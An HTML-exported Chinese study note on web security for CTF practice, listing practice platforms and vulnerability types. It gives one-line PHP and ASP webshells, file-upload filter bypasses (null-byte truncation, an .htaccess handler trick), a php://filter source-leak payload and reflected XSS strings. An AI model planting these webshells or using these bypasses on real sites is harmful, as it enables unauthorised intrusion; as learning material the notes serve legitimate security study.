<!DOCTYPE html>
<html>
<head>
<title>WEBnote</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
<link rel="stylesheet" href="/live2d/css/live2d.css" />

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1>WEB学习笔记</h1>
<h2>实战平台</h2>
<ul>
<li>bugku</li>
<li>实验吧</li>
<li>Jarvis OJ</li>
<li>国外的XSS测试：prompt.ml/0</li>
<li>国外的sql注入的挑战网站：redtiger.labs.overthewire.org</li>
</ul>
<h2>常见WEB漏洞</h2>
<ul>
<li><strong>XSS</strong>	</li>
<li>文件包含/上传</li>
<li><strong>SQL注入</strong>	</li>
<li><strong>反序列化</strong></li>
<li>CSRF	</li>
<li>未授权访问</li>
<li>SSRF	</li>
<li>目录遍历</li>
<li>命令执行	</li>
<li>业务逻辑漏洞</li>
<li>XEE</li>
</ul>
<h2>文件包含/上传</h2>
<h3>一句话木马</h3>
<ul>
<li>php版本:	&lt;?php eval($_POST[&quot;pwd&quot;]);?&gt;</li>
<li>javascript:	<script language="php">@eval_r($_POST['pwd'])</script></li>
<li>asp:	&lt;% eval request(&quot;pwd&quot;) %&gt; 或 &lt;%execute(request(&quot;pwd&quot;))%&gt; </li>
<li>asxp:	&lt;%@ Page Lanuage=&quot;Jscript&quot;%&gt;&lt;%eval(Request.Item[&quot;pwd&quot;])%&gt;</li>
</ul>
<h3>1.前端检查</h3>
<ul>
<li>先上传jpg文件，BurpSuite中修改后缀名（将jpg改回php）绕过</li>
<li>修改文件后缀名为php3\php4\php5\phtml绕过</li>
</ul>
<h3>2.截断</h3>
<p>当数据包内存在文件上传路径时，将路径末尾改为0x00，可以绕过对后面文件的检查</p>
<h3>3.扩展名检查黑名单</h3>
<ul>
<li>利用Apache漏洞（自动略过无法解析的扩展名），将文件扩展名编辑为.php.abc</li>
<li>
<p>.htaccess
在txt中写入</p>
<pre><code>&lt;FilesMatch &quot;attack&quot;&gt; SetHandler application/x-httpd-php &lt;/FilesMatch&gt;
</code></pre>

<p>然后cmd中：</p>
<pre><code>ren 2.txt .htaccess
</code></pre>

<p>上传此文件，再上传jpg（php）,连接attack.jpg</p>
</li>
</ul>
<h2>- 利用大小写(需要win系统)</h2>
<p>??: 如何查看apache配置</p>
<h2>sql注入</h2>
<h2>XFF/refer伪造</h2>
<table>
<tbody>
<tr>
	<td align="center">X-Forwarded-For</td>
	<td align="center">Client, proxy1, proxy2 ...</td>
</tr>
<tr>
	<td align="center">Referer</td>
	<td align="center">......</td>
</tr>
</tbody>
</table>
<h2>php-fillter 泄露源代码</h2>
<p>参考 <em>https://blog.csdn.net/qq_29419013/article/details/81201494</em>
phpfillter: 
?page=php://filter/read=convert.base64-encode//resource=index
查看index.php的源码</p>
<h2>XSS</h2>
<h3>反射型XSS</h3>
<p>直接注入代码执行
常见有：
- 普通代码：<script>alert(&quot;Hello&quot;)</script>
- 截断代码：1' - alert(&quot;Hello&quot;) - '  (img标签)
- 错误执行：100'onerror=alert(&quot;Hello&quot;)&gt;</p>


<div id="landlord" style="left:5px;bottom:0px;">
    <div class="message" style="opacity:0"></div>
    <canvas id="live2d" width="500" height="560" class="live2d"></canvas>
    <div class="live_talk_input_body">
    	<div class="live_talk_input_name_body">
        	<input name="name" type="text" class="live_talk_name white_input" id="AIuserName" autocomplete="off" placeholder="你的名字" />
        </div>
        <div class="live_talk_input_text_body">
        	<input name="talk" type="text" class="live_talk_talk white_input" id="AIuserText" autocomplete="off" placeholder="Hello？"/>
            <button type="button" class="live_talk_send_btn" id="talk_send">发送</button>
        </div>
    </div>
    <input name="live_talk" id="live_talk" value="1" type="hidden" />
    <div class="live_ico_box">
    	<div class="live_ico_item type_info" id="showInfoBtn"></div>
    	<div class="live_ico_item type_talk" id="showTalkBtn"></div>
        <div class="live_ico_item type_quit" id="hideButton"></div>
        <input name="live_statu_val" id="live_statu_val" value="0" type="hidden" />
    </div>
</div>
<div id="open_live2d">召唤伊斯特瓦尔</div>

<script type="text/javascript" src="https://apps.bdimg.com/libs/jquery/1.7.1/jquery.min.js"></script>
<script>
var message_Path = '/live2d/';//资源目录
var talkAPI = "";
</script>
<script type="text/javascript" src="live2d/js/live2d.js"></script>
<script type="text/javascript" src="live2d/js/message.js"></script>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
